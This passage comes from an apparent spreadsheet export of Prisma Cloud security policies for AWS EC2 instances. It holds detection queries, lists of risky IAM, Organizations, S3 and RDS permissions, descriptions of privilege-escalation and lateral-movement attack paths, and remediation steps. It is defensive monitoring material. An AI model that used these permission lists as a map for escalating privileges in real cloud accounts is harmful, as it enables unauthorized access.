      <c r="V1696" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1696" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with unusual usage of instance role credentials and risky IAM write permissions.
Risky permissions on AWS EC2 instances with unusual usage of instance role credentials may allow an attacker to get initial access to the instance. The risky IAM write permissions on the instance further help the attackers perform unauthorized IAM actions in the cloud account. Unusual EC2 role credential usage from outside the cloud may indicate instance is already compromised.
This policy checks for the following risky IAM write permissions:
'iam:AddClientIDToOpenIDConnectProvider', 'iam:AddRoleToInstanceProfile', 'iam:AddUserToGroup', 'iam:ChangePassword', 'iam:CreateAccessKey', 'iam:CreateAccountAlias', 'iam:CreateGroup', 'iam:CreateInstanceProfile', 'iam:CreateLoginProfile', 'iam:CreateOpenIDConnectProvider', 'iam:CreateRole', 'iam:CreateSAMLProvider', 'iam:CreateServiceLinkedRole', 'iam:CreateServiceSpecificCredential', 'iam:CreateUser', 'iam:CreateVirtualMFADevice', 'iam:DeactivateMFADevice', 'iam:DeleteAccessKey', 'iam:DeleteAccountAlias', 'iam:DeleteGroup', 'iam:DeleteInstanceProfile', 'iam:DeleteLoginProfile', 'iam:DeleteOpenIDConnectProvider', 'iam:DeleteRole', 'iam:DeleteSAMLProvider', 'iam:DeleteSSHPublicKey', 'iam:DeleteServerCertificate', 'iam:DeleteServiceLinkedRole', 'iam:DeleteServiceSpecificCredential', 'iam:DeleteSigningCertificate', 'iam:DeleteUser', 'iam:DeleteVirtualMFADevice', 'iam:EnableMFADevice', 'iam:PassRole', 'iam:RemoveClientIDFromOpenIDConnectProvider', 'iam:RemoveRoleFromInstanceProfile', 'iam:RemoveUserFromGroup', 'iam:ResetServiceSpecificCredential', 'iam:ResyncMFADevice', 'iam:SetSecurityTokenServicePreferences', 'iam:UpdateAccessKey', 'iam:UpdateAccountPasswordPolicy', 'iam:UpdateGroup', 'iam:UpdateLoginProfile', 'iam:UpdateOpenIDConnectProviderThumbprint', 'iam:UpdateRole', 'iam:UpdateRoleDescription', 'iam:UpdateSAMLProvider', 'iam:UpdateSSHPublicKey', 'iam:UpdateServerCertificate', 'iam:UpdateServiceSpecificCredential', 'iam:UpdateSigningCertificate', 'iam:UpdateUser', 'iam:UploadSSHPublicKey', 'iam:UploadServerCertificate', 'iam:UploadSigningCertificate'
Immediate attention is required to review unusual usage activity of instance role credentials and risky write permissions.</t>
        </is>
      </c>
      <c r="X1696"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696" t="inlineStr"/>
      <c r="Z1696" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Unusual usage of Workload Credentials from outside the Cloud','AWS EC2 Instance with IAM write permissions')</t>
        </is>
      </c>
      <c r="AA1696" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1696" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:32</t>
        </is>
      </c>
      <c r="AC1696" t="inlineStr"/>
      <c r="AD1696" t="b">
        <v>1</v>
      </c>
      <c r="AE1696" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1696" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG16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6" t="inlineStr">
        <is>
          <t>a63894ce-500b-4b99-ba7b-31900332fc62</t>
        </is>
      </c>
      <c r="AI1696" t="inlineStr">
        <is>
          <t>c568e1fd-135d-426c-8dbd-bb2d9fc06797</t>
        </is>
      </c>
      <c r="AJ1696" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1696" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1697">
      <c r="A1697" t="inlineStr"/>
      <c r="B1697" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1697" s="2" t="inlineStr"/>
      <c r="D1697" t="inlineStr"/>
      <c r="E1697" t="inlineStr"/>
      <c r="F1697" t="inlineStr"/>
      <c r="G1697" t="b">
        <v>1</v>
      </c>
      <c r="H16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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1697" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1697" t="inlineStr">
        <is>
          <t>Data exposure and data loss risk due to a publicly exposed and vulnerable AWS EC2 instance with permissions over sensitive S3 configuration</t>
        </is>
      </c>
      <c r="L1697" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1697" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1697" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1697" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1697" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1697" t="inlineStr"/>
      <c r="R1697" t="inlineStr"/>
      <c r="S1697" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1697" t="b">
        <v>0</v>
      </c>
      <c r="U1697" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1697" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1697" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with critical or high vulnerabilities and permissions over sensitive S3 configuration.
Critical or high vulnerabilities on publicly exposed EC2 instances pose significant security risks as attackers can exploit the instances remotely to gain access. Granting permissions over sensitive S3 configuration to a publicly exposed EC2 instances with critical or high vulnerabilities may allow an attacker to gain access to the vulnerable instances and leverage that access to modify S3 configuration and lead to data loss or data exposure.
This policy checks for the following write permissions over security groups:
's3:PutObjectRetention', 's3:PutLifecycleConfiguration' ,'s3:PutBucketPolicy' ,'s3:PutBucketVersioning'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X169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697" t="inlineStr"/>
      <c r="Z1697" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 with write permission on critical configuration for s3') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1697" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1697" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1697" t="inlineStr"/>
      <c r="AD1697" t="b">
        <v>1</v>
      </c>
      <c r="AE1697" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1697" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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7" t="inlineStr">
        <is>
          <t>052ead38-73ae-43d3-8361-46126165dcba</t>
        </is>
      </c>
      <c r="AI1697" t="inlineStr">
        <is>
          <t>4f458065-2528-470f-8f87-fda9bb56944c</t>
        </is>
      </c>
      <c r="AJ1697" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1697" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1698">
      <c r="A1698" t="inlineStr"/>
      <c r="B1698" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1698" s="2" t="inlineStr"/>
      <c r="D1698" t="inlineStr"/>
      <c r="E1698" t="inlineStr"/>
      <c r="F1698" t="inlineStr"/>
      <c r="G1698" t="b">
        <v>1</v>
      </c>
      <c r="H16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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1698" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1698" t="inlineStr">
        <is>
          <t>Unauthorized changes risk to an entire AWS organization's resources and settings due to a publicly exposed admin ports on AWS EC2 instance with ORG level 'write' permissions</t>
        </is>
      </c>
      <c r="L1698" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1698" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1698" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1698" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1698" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1698" t="inlineStr"/>
      <c r="R1698" t="inlineStr"/>
      <c r="S1698" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1698" t="b">
        <v>0</v>
      </c>
      <c r="U1698" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1698" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1698" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have ORG level WRITE permissions that could potentially lead to privilege escalation.
Risky permissions on publicly exposed EC2 instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to get initial access to the instance. EC2 instance with ORG level write permissions could further expand the surface of the attacker and move laterally to perform unauthorized actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'organizations:AcceptHandshake', 'organizations:AttachPolicy', 'organizations:CancelHandshake', 'organizations:CreateAccount', 'organizations:CreateGovCloudAccount', 'organizations:CreateOrganization', 'organizations:CreateOrganizationalUnit', 'organizations:CreatePolicy', 'organizations:DeclineHandshake', 'organizations:DeleteOrganization', 'organizations:DeleteOrganizationalUnit', 'organizations:DeletePolicy', 'organizations:DeregisterDelegatedAdministrator', 'organizations:DetachPolicy', 'organizations:DisableAWSServiceAccess', 'organizations:DisablePolicyType', 'organizations:EnableAWSServiceAccess', 'organizations:EnableAllFeatures', 'organizations:EnablePolicyType', 'organizations:InviteAccountToOrganization', 'organizations:LeaveOrganization', 'organizations:MoveAccount', 'organizations:RegisterDelegatedAdministrator', 'organizations:RemoveAccountFromOrganization', 'organizations:UpdateOrganizationalUnit', 'organizations:UpdatePolicy'
Immediate attention is required to review risky ORG level write permissions. Restrict public exposure of admin ports reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X169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698" t="inlineStr"/>
      <c r="Z1698" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports','AWS EC2 Instance with AWS Organization management permissions')</t>
        </is>
      </c>
      <c r="AA1698" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1698" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:07</t>
        </is>
      </c>
      <c r="AC1698" t="inlineStr"/>
      <c r="AD1698" t="b">
        <v>1</v>
      </c>
      <c r="AE1698" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1698" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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8" t="inlineStr">
        <is>
          <t>83bc030b-6c95-4c34-874d-8552c411bec4</t>
        </is>
      </c>
      <c r="AI1698" t="inlineStr">
        <is>
          <t>ddab4943-aced-403f-ac64-e73d820957a4</t>
        </is>
      </c>
      <c r="AJ1698" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1698" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1699">
      <c r="A1699" t="inlineStr"/>
      <c r="B1699" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1699" s="2" t="inlineStr"/>
      <c r="D1699" t="n">
        <v>7</v>
      </c>
      <c r="E1699" t="n">
        <v>0</v>
      </c>
      <c r="F1699" t="n">
        <v>0</v>
      </c>
      <c r="G1699" t="b">
        <v>1</v>
      </c>
      <c r="H16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699" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1699" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1699" t="inlineStr">
        <is>
          <t>Credential exposure risk due to publicly exposed admin ports on AWS EC2 instance with credentials exposure permissions</t>
        </is>
      </c>
      <c r="L1699" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1699" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1699" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1699" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1699" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1699" t="inlineStr"/>
      <c r="R1699" t="inlineStr"/>
      <c r="S1699" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1699" t="b">
        <v>0</v>
      </c>
      <c r="U1699" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1699" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1699" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have credentials exposure permissions.
Risky permissions on publicly exposed EC2 instances with unrestricted access to admin ports (SSH / RDP) may allow an attacker to get initial access to the instance. EC2 instance with credentials exposure permissions could further expand the surface of the attack and grant access to credentials for critical resources hosted on AWS.
This policy checks for the following risky permissions that could potentially lead to privilege escalation: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Immediate attention is required to review risky credentials exposure permissions. Restrict public exposure of admin ports reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X169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699" t="inlineStr"/>
      <c r="Z1699" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0) on Admin ports','AWS EC2 with IAM role attached has credentials exposure permissions')</t>
        </is>
      </c>
      <c r="AA1699" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1699" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:07</t>
        </is>
      </c>
      <c r="AC1699" t="inlineStr"/>
      <c r="AD1699" t="b">
        <v>1</v>
      </c>
      <c r="AE1699" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1699" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG16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699" t="inlineStr">
        <is>
          <t>e6562076-5231-4345-ab7a-12c70aa76322</t>
        </is>
      </c>
      <c r="AI1699" t="inlineStr">
        <is>
          <t>9708e4fc-dea9-4d67-838b-0bfaccff172d</t>
        </is>
      </c>
      <c r="AJ1699" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1699" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1700">
      <c r="A1700" t="inlineStr"/>
      <c r="B1700" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1700" s="2" t="inlineStr"/>
      <c r="D1700" t="inlineStr"/>
      <c r="E1700" t="inlineStr"/>
      <c r="F1700" t="inlineStr"/>
      <c r="G1700" t="b">
        <v>1</v>
      </c>
      <c r="H17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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1700" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1700" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [WebLogic, CVE-2019-2725, CVE-2019-2729]</t>
        </is>
      </c>
      <c r="L1700" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1700" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1700" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1700" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1700" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1700" t="inlineStr"/>
      <c r="R1700" t="inlineStr"/>
      <c r="S1700" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1700" t="b">
        <v>0</v>
      </c>
      <c r="U1700" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1700" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1700" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [WebLogic, CVE-2019-2725, CVE-2019-2729].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerabilities on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of WebLogic software installed makes it an easy target for an attacker to exploit these vulnerabilities.
Immediate attention is required to remediate the WebLogic [CVE-2019-2725, CVE-2019-2729] vulnerabilities reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X170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CVE-2019-2725
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2019-2725
   https://nvd.nist.gov/vuln/detail/CVE-2019-2729</t>
        </is>
      </c>
      <c r="Y1700" t="inlineStr"/>
      <c r="Z1700" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2019-2725, CVE-2019-2729 - WebLogic) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2019-2725', 'CVE-2019-2729'))</t>
        </is>
      </c>
      <c r="AA1700" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1700" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:37</t>
        </is>
      </c>
      <c r="AC1700" t="inlineStr"/>
      <c r="AD1700" t="b">
        <v>1</v>
      </c>
      <c r="AE1700" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1700" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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0" t="inlineStr">
        <is>
          <t>f4b576ed-fec3-457d-b4c1-34b4728cb8c1</t>
        </is>
      </c>
      <c r="AI1700" t="inlineStr">
        <is>
          <t>72c650fb-8c87-4b3f-8008-6ac0d46dab87</t>
        </is>
      </c>
      <c r="AJ1700" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1700" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1701">
      <c r="A1701" t="inlineStr"/>
      <c r="B1701" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1701" s="2" t="inlineStr"/>
      <c r="D1701" t="inlineStr"/>
      <c r="E1701" t="inlineStr"/>
      <c r="F1701" t="inlineStr"/>
      <c r="G1701" t="b">
        <v>1</v>
      </c>
      <c r="H17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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1701" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1701" t="inlineStr">
        <is>
          <t>Data breach risk due to a publicly exposed and vulnerable AWS EC2 instance with Amazon RDS database SQL query execution permissions</t>
        </is>
      </c>
      <c r="L1701" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1701" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1701" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1701" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1701" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1701" t="inlineStr"/>
      <c r="R1701" t="inlineStr"/>
      <c r="S1701" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1701" t="b">
        <v>0</v>
      </c>
      <c r="U1701" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1701" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1701" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with critical or high vulnerabilities, and SQL query execution permissions for the Amazon RDS database.
Publicly exposed vulnerable EC2 instances could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. An attacker with access to the SQL query command execution permissions can perform unauthorized modifications or unauthorized access to sensitive information stored in the databases which could lead to potential data breaches. 
This policy checks for the following privilege escalation permissions:
'rds-data:ExecuteStatement', 'rds-data:BatchExecuteStatement'
Immediate attention is required to grant only the least privileges required and remove unwanted permissions assigned to the EC2 instance. Remediate critical and high vulnerabilities, and restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X170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01" t="inlineStr"/>
      <c r="Z1701" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 with IAM role with destruction permissions for Amazon RDS databases') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA1701" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1701" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC1701" t="inlineStr"/>
      <c r="AD1701" t="b">
        <v>1</v>
      </c>
      <c r="AE1701" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1701" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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1" t="inlineStr">
        <is>
          <t>76cd774c-c75b-46e3-86a9-ee691f3d8b5f</t>
        </is>
      </c>
      <c r="AI1701" t="inlineStr">
        <is>
          <t>c61d7977-ff85-4251-afd6-ebd427e6b401</t>
        </is>
      </c>
      <c r="AJ1701" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1701" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1702">
      <c r="A1702" t="inlineStr"/>
      <c r="B1702" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1702" s="2" t="inlineStr"/>
      <c r="D1702" t="inlineStr"/>
      <c r="E1702" t="inlineStr"/>
      <c r="F1702" t="inlineStr"/>
      <c r="G1702" t="b">
        <v>1</v>
      </c>
      <c r="H17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02" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1702" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1702" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed AWS EC2 instance with lateral movement finding to admin in another account</t>
        </is>
      </c>
      <c r="L1702" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1702" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1702" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1702" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1702" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1702" t="inlineStr"/>
      <c r="R1702" t="inlineStr"/>
      <c r="S1702" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1702" t="b">
        <v>0</v>
      </c>
      <c r="U1702" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1702" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1702" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed with lateral movement finding to admin in another account.
Publicly exposed EC2 instances could allow malicious actors to get initial access to the instance. An attacker's access to EC2 instance with lateral movement finding to admin in another account could allow them to escalate privileges through the EC2 instance, enabling them to move laterally and carry out unauthorized actions in the other cloud account by leveraging assumed administrative permissions.
Immediate attention is required to grant only the least privileges required and remove unwanted role assignments / permissions assigned to the EC2 instance. Restrict public exposure reported for the EC2 instances as soon as possible.</t>
        </is>
      </c>
      <c r="X1702"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[PERMISSION]
In order to remove any administrative permissions and minimize trusted entities which can assume the role, use the following remediation steps:
1. Browse to the privileged role ("Destination") in the AWS Console
2. Select "Trust relationships"-&gt;"Edit trust policy"
3. Modify the role's trust relationship as per requirements
4.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1702" t="inlineStr"/>
      <c r="Z1702" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','Compute resource can assume a Service Account with admin privileges in another account')</t>
        </is>
      </c>
      <c r="AA1702" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1702" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:25</t>
        </is>
      </c>
      <c r="AC1702" t="inlineStr"/>
      <c r="AD1702" t="b">
        <v>1</v>
      </c>
      <c r="AE1702" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1702" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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02" t="inlineStr">
        <is>
          <t>4d36dfff-53ca-4d9e-8af6-af031f7c576b</t>
        </is>
      </c>
      <c r="AI1702" t="inlineStr">
        <is>
          <t>156863ac-d181-49d4-946c-93e58addb1c2</t>
        </is>
      </c>
      <c r="AJ1702" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1702" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1703">
      <c r="A1703" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0, TX-RAMP Level 2, NYDFS 23 CRR-NY 500.0</t>
        </is>
      </c>
      <c r="B1703" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C1703" s="2" t="inlineStr"/>
      <c r="D1703" t="n">
        <v>0</v>
      </c>
      <c r="E1703" t="n">
        <v>0</v>
      </c>
      <c r="F1703" t="n">
        <v>2</v>
      </c>
      <c r="G1703" t="b">
        <v>1</v>
      </c>
      <c r="H17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03" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1703" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1703" t="inlineStr">
        <is>
          <t>AWS EC2 instance is assigned with public IP</t>
        </is>
      </c>
      <c r="L1703" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1703" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1703" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1703" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1703" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1703" t="inlineStr">
        <is>
          <t>500.2</t>
        </is>
      </c>
      <c r="R1703" t="inlineStr">
        <is>
          <t>500.02 (b) (2)</t>
        </is>
      </c>
      <c r="S1703" t="inlineStr"/>
      <c r="T1703" t="b">
        <v>0</v>
      </c>
      <c r="U1703" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1703" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1703" t="inlineStr">
        <is>
          <t>This policy identifies the AWS EC2 instance having a public IP address assigned.
AWS EC2 instances with public IPs are virtual servers hosted in the Amazon Web Services (AWS) cloud that can be accessed over the internet. Public IPs increase an EC2 instance's attack surface, necessitating robust security configurations to prevent unauthorized access and attacks.
It is recommended to use private IPv4 addresses for communication between EC2 instances and disassociate the public IP address from an instance or disable auto-assign public IP addresses in the subnet.</t>
        </is>
      </c>
      <c r="X1703" t="inlineStr">
        <is>
          <t>In a default VPC, instances get a public IP address. In a non-default VPC, the subnet configuration determines this.
You can't manually change an automatically-assigned public IP. To control public IP assignment:
To unassign the IP addresses associated with a network interface, follow the instructions here: 
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.html#managing-network-interface-ip-addresses
Note: If you specify an existing network interface for eth0 (the primary network interface), you can't change its public IP address settings using the auto-assign public IP feature; the subnet settings will take precedence.
Modify the subnet's public IP addressing attribute by following these actions: 
 https://docs.aws.amazon.com/vpc/latest/userguide/vpc-ip-addressing.html#subnet-public-ip
If you are using an Elastic IP, the instance is internet-reachable. To disassociate an Elastic IP, follow these actions: 
